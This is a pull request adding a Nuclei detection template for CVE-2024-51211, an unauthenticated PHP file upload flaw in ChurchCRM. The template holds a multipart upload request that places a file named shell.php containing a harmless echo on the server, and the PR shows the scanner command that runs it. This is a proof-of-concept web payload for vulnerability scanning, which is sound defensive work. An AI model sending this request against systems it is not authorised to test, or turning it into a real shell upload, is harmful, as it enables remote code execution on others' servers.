### PR TITLE
Add CVE-2024-51211 - ChurchCRM Arbitrary File Upload

### DIFF
--- a/CVE-2024-51211.yaml
+++ b/CVE-2024-51211.yaml
@@ -1,0 +1,31 @@
+id: CVE-2024-51211
+info:
+  name: ChurchCRM <4.5.5 - Arbitrary File Upload
+  author: haliteroglu
+  severity: high
+  description: |
+    ChurchCRM 4.5.5 ve öncesinde, dosya uzantısı kontrol edilmeden dosya yüklenmesine izin verildiğinden,
+    saldırganlar zararlı PHP dosyaları yükleyerek sistemde uzaktan komut çalıştırabilir.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-51211
+    - https://github.com/ChurchCRM/CRM
+  tags: cve, churchcrm, rce, fileupload
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/fileupload/upload.php"
+    body: |
+      ------WebKitFormBoundary
+      Content-Disposition: form-data; name="file"; filename="shell.php"
+      Content-Type: application/octet-stream
+
+      <?php echo "vulnerable"; ?>
+      ------WebKitFormBoundary--
+
+    headers:
+      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
+
+    matchers:
+      - type: word
+        words:
+          - "vulnerable"


### PR DESCRIPTION
### Description

This Nuclei template detects **CVE-2024-51211**, a file upload vulnerability in ChurchCRM <4.5.5.

Unauthenticated users can upload arbitrary PHP files via the `upload.php` endpoint due to missing extension validation. This may lead to remote code execution (RCE).

- CVE: https://nvd.nist.gov/vuln/detail/CVE-2024-51211
- Vendor: https://github.com/ChurchCRM/CRM
- Author: haliteroglu 

### How to use

```bash
nuclei -u http://example.com -t cves/2024/CVE-2024-51211.yaml